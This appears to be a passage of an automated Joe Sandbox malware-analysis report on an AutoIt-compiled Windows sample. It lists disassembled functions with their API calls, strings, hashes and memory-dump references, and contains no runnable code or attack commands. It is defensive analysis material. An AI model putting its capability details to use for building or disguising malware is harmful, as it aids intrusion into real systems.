API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 41d1fc146e4567a88173a233285f07a0c7539f08bd543445f11f7a7e7e47bd44
Instruction ID: deca2bc4588d20c7f9c9425fcc0253ae2fedbff43ba9eeb6460b8af84bb26218
Opcode Fuzzy Hash: 41d1fc146e4567a88173a233285f07a0c7539f08bd543445f11f7a7e7e47bd44
Instruction Fuzzy Hash: 29F082B29403007FF7602765AC06FBB3A9CEB08395FC04420FA89E5186D77F4C008BA8

Function 00FF6BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00FF6BE6

Part of subcall function 00FF76C4: _memset.LIBCMT ref: 00FF76F9

_memmove.LIBCMT ref: 00FF6C09
_memset.LIBCMT ref: 00FF6C16
LeaveCriticalSection.KERNEL32(?), ref: 00FF6C26

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 787298e3948191bdf0c07f4e6944df9d3666a93624b770118f393a22cf37c537
Instruction ID: 256318b75c5c889c29d0e252984ecd5232d50e5b16c6423275f1d4f7fdc5cc4b
Opcode Fuzzy Hash: 787298e3948191bdf0c07f4e6944df9d3666a93624b770118f393a22cf37c537
Instruction Fuzzy Hash: 99F0547A100104ABCF016F55DC85A8ABF29EF45361F048051FE089E227C739E811DBB4

Function 0101BD1C Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00F912F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F9134D
Part of subcall function 00F912F3: SelectObject.GDI32(?,00000000), ref: 00F9135C
Part of subcall function 00F912F3: BeginPath.GDI32(?), ref: 00F91373
Part of subcall function 00F912F3: SelectObject.GDI32(?,00000000), ref: 00F9139C

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0101BD40
LineTo.GDI32(00000000,?,?), ref: 0101BD4D
EndPath.GDI32(00000000), ref: 0101BD5D
StrokePath.GDI32(00000000), ref: 0101BD6B

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 87bb95eeb93e6d79bec15da538d1a345ea71dbac2a9e44c658caecc18ff2f0cd
Instruction ID: d48cb67a2a02f36a411bca120791ece6657e8cc6f50b771e0d456c6816dbc9bc
Opcode Fuzzy Hash: 87bb95eeb93e6d79bec15da538d1a345ea71dbac2a9e44c658caecc18ff2f0cd
Instruction Fuzzy Hash: 2BF0E23100025ABBEB336F95AC09FCE3FA8AF06310F044040FA90210D5C77E0254CF96

Function 00F92218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00F92231
SetTextColor.GDI32(?,000000FF), ref: 00F9223B
SetBkMode.GDI32(?,00000001), ref: 00F92250
GetStockObject.GDI32(00000005), ref: 00F92258
GetWindowDC.USER32(?,00000000), ref: 00FCBE83
GetPixel.GDI32(00000000,00000000,00000000), ref: 00FCBE90
GetPixel.GDI32(00000000,?,00000000), ref: 00FCBEA9
GetPixel.GDI32(00000000,00000000,?), ref: 00FCBEC2
GetPixel.GDI32(00000000,?,?), ref: 00FCBEE2
ReleaseDC.USER32(?,00000000), ref: 00FCBEED

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 580736679ae5c544f9c576c6f842d9c9327dee166028c49f96bb2e43d8a5639b
Instruction ID: 08bfc4b904660104943d654bd821c98a75ef261fe71a2d5b0ae65a5a6d8dad7d
Opcode Fuzzy Hash: 580736679ae5c544f9c576c6f842d9c9327dee166028c49f96bb2e43d8a5639b
Instruction Fuzzy Hash: 3CE03031544146AAEF215FA4F80EBD83B11EB06332F10835AFAA9480D5C77A4984EB11

Function 00FE8712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00FE871B
OpenThreadToken.ADVAPI32(00000000,?,?,?,00FE82E6), ref: 00FE8722
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00FE82E6), ref: 00FE872F
OpenProcessToken.ADVAPI32(00000000,?,?,?,00FE82E6), ref: 00FE8736

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 42c09e1801b1492390f7e07d5d4b4a9f3aeca1a0392497c131d0b68d609f69e2
Instruction ID: 2392692eba3c779c155f447d6ee605ec172bda9c2ddb28eb0862ecccd242ca3b
Opcode Fuzzy Hash: 42c09e1801b1492390f7e07d5d4b4a9f3aeca1a0392497c131d0b68d609f69e2
Instruction Fuzzy Hash: 01E08636A112129FD7306FB15D0CB9A3BACEF507E1F158818F6C9CA044DA3D844AD750

Function 00FEB2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 00FEB4BE

Strings

AutoIt3GUI, xrefs: 00FEB436
Container, xrefs: 00FEB43B

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 9373419ad19f1e35d8141ef5ba349ec11db19a2615dcb9e25949066aefd3bb1e
Instruction ID: e996e2de4b2d194e059fc8993fc9482403025f3afe14a24e3ee87f08a18836ab
Opcode Fuzzy Hash: 9373419ad19f1e35d8141ef5ba349ec11db19a2615dcb9e25949066aefd3bb1e
Instruction Fuzzy Hash: BC915871600701AFDB14DF69C884B6BBBE5FF48710F24856DE94ACB291DB70E841DB50

Function 00FFAFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00FAFC86: _wcscpy.LIBCMT ref: 00FAFCA9

Part of subcall function 00F99837: __itow.LIBCMT ref: 00F99862
Part of subcall function 00F99837: __swprintf.LIBCMT ref: 00F998AC

__wcsnicmp.LIBCMT ref: 00FFB02D
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00FFB0F6

Strings

LPT, xrefs: 00FFB027

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: b3a7e4ca83c0039e075c689dbccdfd9ac02e433d7284cfe69bcc8402dc830e75
Instruction ID: 6aedb657acfb123f5f26f1ca23ce3b8bdb11f1b2800fa9c1e9aa06b96af6bf74
Opcode Fuzzy Hash: b3a7e4ca83c0039e075c689dbccdfd9ac02e433d7284cfe69bcc8402dc830e75
Instruction Fuzzy Hash: D561B472E00219AFCB14DF98C891EBEB7B5EF08310F15406DF916AB261DB74AE44EB50

Function 00FA2957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00FA2968
GlobalMemoryStatusEx.KERNEL32(?), ref: 00FA2981

Strings

@, xrefs: 00FA2975

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 86a9fe62b084a7095515bae5683ada38c400ab55b662000cbbcc7aa693c7e5b2
Instruction ID: 713b9f4d5ff80eba5dacb64a380d4a79850675aec531c7bdf8f30d52c449c515
Opcode Fuzzy Hash: 86a9fe62b084a7095515bae5683ada38c400ab55b662000cbbcc7aa693c7e5b2
Instruction Fuzzy Hash: 5A517A714187449BE720EF14DC86BAFBBE8FF85340F82484DF2D881095EB798929DB56

Function 00FF9734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00F94F0B: __fread_nolock.LIBCMT ref: 00F94F29

_wcscmp.LIBCMT ref: 00FF9824
_wcscmp.LIBCMT ref: 00FF9837

Strings

FILE, xrefs: 00FF9770

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 251443b0e5c769d1ed77c2169b0b6dc73713bed1ea59dd35c602bc8a3dcfdf0f
Instruction ID: 06bbd8b805389b47fb3f6cd2cb58ec2ce43416d973857bfcb32d5fc1f3e8859c
Opcode Fuzzy Hash: 251443b0e5c769d1ed77c2169b0b6dc73713bed1ea59dd35c602bc8a3dcfdf0f
Instruction Fuzzy Hash: 6941E671A0420EBADF219EA0CC85FEFB7BDDF85714F000479FA04A7190D6B5A905DB60

Function 0100258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0100259E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 010025D4

Strings

|, xrefs: 010025A5

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 461eddc15362ab904af3f09d78b84fd390298d161985006b7c41286ab7f3a2c0
Instruction ID: 82aee7e9c1ea57efbf62c96b98b3a678e45f18eb1cbd13573986bb9cbec64bd9
Opcode Fuzzy Hash: 461eddc15362ab904af3f09d78b84fd390298d161985006b7c41286ab7f3a2c0
Instruction Fuzzy Hash: 98313A71800219EBEF01EFA5CC89EEEBFB9FF08350F000059F955A6162EB355A56DB60

Function 01017A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 01017B61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 01017B76

Strings

', xrefs: 01017ACA

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 0ebb90d35fa30b53688b2657704c7b29a0938cf03eacede551ece1904e3dfecb
Instruction ID: 4ddb6f8461a24eb1d27617fc6d663063a5e1e283237fbf835dd40df82bfb62b3
Opcode Fuzzy Hash: 0ebb90d35fa30b53688b2657704c7b29a0938cf03eacede551ece1904e3dfecb
Instruction Fuzzy Hash: 81413C75A0030A9FDB54CFA8C880BEABBF5FF08300F50016AEA45AB345D735AA41CF90

Function 01016A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 01016B17
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 01016B53

Strings

static, xrefs: 01016AB3

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 8ea30b6ad66c5bee68a6e7169e456603023d292e6726e2e9d8c96e234fee94aa
Instruction ID: 749295d9ec1042e702542641f7110fddd38fbebf4e1169bdde4d53eb0d83b695
Opcode Fuzzy Hash: 8ea30b6ad66c5bee68a6e7169e456603023d292e6726e2e9d8c96e234fee94aa
Instruction Fuzzy Hash: 4C31B071100204AEEB119F69CC80BFB77F9FF48760F00851DF9E987194DA7AA881CB60

Function 00FF28A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FF2911
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00FF294C

Strings

0, xrefs: 00FF290A

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 87cff42c8b55091ec86792741e2812c6b0e71442cf28e8bf1a5e70d4b94df24a
Instruction ID: b2da3c772a246f1f99cdb878fde20632579393e3a37d34c62f838833a506c6b1
Opcode Fuzzy Hash: 87cff42c8b55091ec86792741e2812c6b0e71442cf28e8bf1a5e70d4b94df24a
Instruction Fuzzy Hash: 9531BF31A003099BEB74CE98CC85BFEBBB8EF45360F140059EA85A71B0DBB49944FB51

Function 010039E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 01003A66

Part of subcall function 00F97DE1: _memmove.LIBCMT ref: 00F97E22

Strings

, $, xrefs: 01003AA6
AUTOITCALLVARIABLE%d, xrefs: 01003A58

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: 8ecc9f0b38afc371b1dadc51c15d5b5a724709ce7145d0bc6d4a6a478dcc4658
Instruction ID: 0cabcdc8dd5183e5da871fda3278a505127cd5f58838f0fe5db39a8bfbf7fc6d
Opcode Fuzzy Hash: 8ecc9f0b38afc371b1dadc51c15d5b5a724709ce7145d0bc6d4a6a478dcc4658
Instruction Fuzzy Hash: F021A270A00219AFDF16FFA5CC82EAE77B9BF45700F004469F545AB182DB38E945DB61

Function 010166D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 01016761
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0101676C

Strings

Combobox, xrefs: 0101672E

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 5edb954ddf1d31206538fafc1853154a992706d8f9fbe27418b1214d8d5453e6
Instruction ID: a0997ca84c7ab2480c78f3e0d282b989e9d60c4e4ada3f778312acee3d6044b9
Opcode Fuzzy Hash: 5edb954ddf1d31206538fafc1853154a992706d8f9fbe27418b1214d8d5453e6
Instruction Fuzzy Hash: 2C11E6713002096FEF22CF18CC80EBB37AAFB483A4F100129F99497295E67A9C5187A0

Function 01016C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00F91D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F91D73
Part of subcall function 00F91D35: GetStockObject.GDI32(00000011), ref: 00F91D87
Part of subcall function 00F91D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F91D91

GetWindowRect.USER32(00000000,?), ref: 01016C71
GetSysColor.USER32(00000012), ref: 01016C8B

Strings

static, xrefs: 01016C4E

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: fb588c7e9f5d83b1146f31243fcc7804c9d873660d2f5b29c34efbf7cc978294
Instruction ID: 59b8c337cfadabf4a2d7cb8dc950a12059de7ce24620ed73076cc562f422cdf4
Opcode Fuzzy Hash: fb588c7e9f5d83b1146f31243fcc7804c9d873660d2f5b29c34efbf7cc978294
Instruction Fuzzy Hash: 3721177291020AAFDF14DFA8CC45AFA7BA8FB08314F004619F995D3244E67AE8519B60

Function 01016920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 010169A2
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 010169B1

Strings

edit, xrefs: 01016986

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: dd8f2d57e9fd6ff9fdc4b7bd6b2029951823fcdbc0569efef3188570cbea91e0
Instruction ID: 9dfc3a764690080bd05295948ef37f55d929f9ea080fb2d91f6f520bdff539e8
Opcode Fuzzy Hash: dd8f2d57e9fd6ff9fdc4b7bd6b2029951823fcdbc0569efef3188570cbea91e0
Instruction Fuzzy Hash: 9F116A71100209ABEB518E78DC40AEB3AAEEB053B8F504718F9E5971D8C6BADC559B60

Function 00FF29AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FF2A22
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00FF2A41

Strings

0, xrefs: 00FF2A18

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 452af4fee2f76457aa1a30f73af783aa452a03ddc7413d535e5c42efdc767df6
Instruction ID: 5b0ad130495e0d14e5af9c5ab91db6d27fdf93f1212acdd33c888f803a6aed7f
Opcode Fuzzy Hash: 452af4fee2f76457aa1a30f73af783aa452a03ddc7413d535e5c42efdc767df6
Instruction Fuzzy Hash: D511E632D1121CABCF70DA98DC45BBA77B8AF46720F044021EA55E72A0D77CAD0AE791

Function 010021D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0100222C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 01002255

Strings

<local>, xrefs: 0100221D

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

